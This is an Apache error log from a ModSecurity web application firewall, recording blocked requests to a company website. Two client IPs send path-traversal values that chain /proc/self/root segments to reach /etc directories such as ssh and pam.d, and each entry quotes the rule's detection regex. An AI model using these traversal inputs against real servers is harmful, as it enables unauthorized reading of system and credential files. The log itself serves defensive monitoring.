[Mon Mar 16 16:32:00.903295 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.243.203:34852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhasM_BxrYCr4hPDw_84wAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:02.262602 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:47710] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhasv9ocpUE4ed4uDwEWgAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:03.471255 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.243.203:47712] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhas9SswJuvopo3lOhxGQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:04.791406 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:47720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhatNSswJuvopo3lOhxGgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:09.522889 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:47728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhauP9ocpUE4ed4uDwEXgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:11.964340 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:45694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhau7ABkC4fWIHEf8EFbgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:14.260118 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.241.46:49806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhavlajLEzk2WiQ-10k6AAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:32:16.589240 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.243.203:45700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhawLysWC90G-1nBrBV6gAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:17.919821 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:51196] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhawY6lpbStxTqkSkt9CQAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:19.022281 2026] [:error] [pid 29507:tid 140411691570944] [client 74.7.243.203:45702] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaw0r9dMAiw-8KANNYmgAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:29.455712 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:41280] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhazdSswJuvopo3lOhxJQAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:31.802404 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.243.203:53364] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaz9SswJuvopo3lOhxJwAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:32.403456 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:41488] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha0KQpVkWug9HeOt9IFQAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:36.246552 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.243.203:53374] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha1KTCbgAP5jq5Teg-UAAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:38.619789 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.243.203:53382] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha1kr9dMAiw-8KANNYogAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:32:39.936223 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:53388] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha17ysWC90G-1nBrBV7gAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:41.440502 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.243.203:35210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha2Ur9dMAiw-8KANNYpAAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:42.700787 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.243.203:35226] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha2kr9dMAiw-8KANNYpgAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:43.927575 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:35236] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha29SswJuvopo3lOhxKQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:45.110000 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:35248] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha3dSswJuvopo3lOhxKwAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:46.451089 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.243.203:35258] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha3lajLEzk2WiQ-10k6wAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:32:47.747784 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:39480] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abha3_9ocpUE4ed4uDwEcwAAAgI"], referer: 